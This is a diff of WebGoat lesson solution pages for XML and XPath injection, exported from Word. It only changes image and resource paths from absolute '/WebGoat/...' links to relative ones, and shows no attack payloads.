<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -663,9 +663,9 @@ ID is 836239.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_61" o:spid="_x0000_i1032" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image017.jpg" v:shapes="Picture_x0020_61"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image017.jpg" v:shapes="Picture_x0020_61"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -689,9 +689,9 @@ intercept the HTTP Request and HTTP Response using WebScarab.<o:p></o:p></span><
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_62" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image018.jpg" v:shapes="Picture_x0020_62"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image018.jpg" v:shapes="Picture_x0020_62"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -705,9 +705,9 @@ field-end'></span><![endif]--> Enter account number</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_63" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/XMLInjection_files/image019.jpg" v:shapes="Picture_x0020_63"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image019.jpg" v:shapes="Picture_x0020_63"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -721,9 +721,9 @@ field-end'></span><![endif]--> Intercepted HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_64" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/XMLInjection_files/image020.jpg" v:shapes="Picture_x0020_64"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image020.jpg" v:shapes="Picture_x0020_64"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -776,9 +776,9 @@ Pts&lt;/reward&gt;</span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_68" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/XMLInjection_files/image021.jpg" v:shapes="Picture_x0020_68"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image021.jpg" v:shapes="Picture_x0020_68"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -797,9 +797,9 @@ do this three times!<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_65" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image022.jpg" v:shapes="Picture_x0020_65"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image022.jpg" v:shapes="Picture_x0020_65"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -813,9 +813,9 @@ field-end'></span><![endif]--> Injected XML results</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_66" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image023.jpg" v:shapes="Picture_x0020_66"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image023.jpg" v:shapes="Picture_x0020_66"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -834,9 +834,9 @@ Laptop and the Cruise and click "Submit".<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_67" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image024.jpg" v:shapes="Picture_x0020_67"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image024.jpg" v:shapes="Picture_x0020_67"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

20
webgoat/main/project/WebContent/lesson_solutions/XPATHInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/XPATHInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/XPATHInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/XPATHInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/XPATHInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/XPATHInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/XPATHInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/XPATHInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/XPATHInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -702,9 +702,9 @@ mso-fareast-language:JA'><o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_141" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/XPATHInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XPATHInjection_files/image007.jpg" v:shapes="Picture_x0020_141"><![endif]></span></p>
src="lesson_solutions/XPATHInjection_files/image007.jpg" v:shapes="Picture_x0020_141"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -735,9 +735,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_142"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/XPATHInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XPATHInjection_files/image008.jpg" v:shapes="Picture_x0020_142"><![endif]></span></p>
src="lesson_solutions/XPATHInjection_files/image008.jpg" v:shapes="Picture_x0020_142"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -760,9 +760,9 @@ And this is how the server interprets it:<br>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_143" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/XPATHInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XPATHInjection_files/image009.jpg" v:shapes="Picture_x0020_143"><![endif]></span></p>
src="lesson_solutions/XPATHInjection_files/image009.jpg" v:shapes="Picture_x0020_143"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC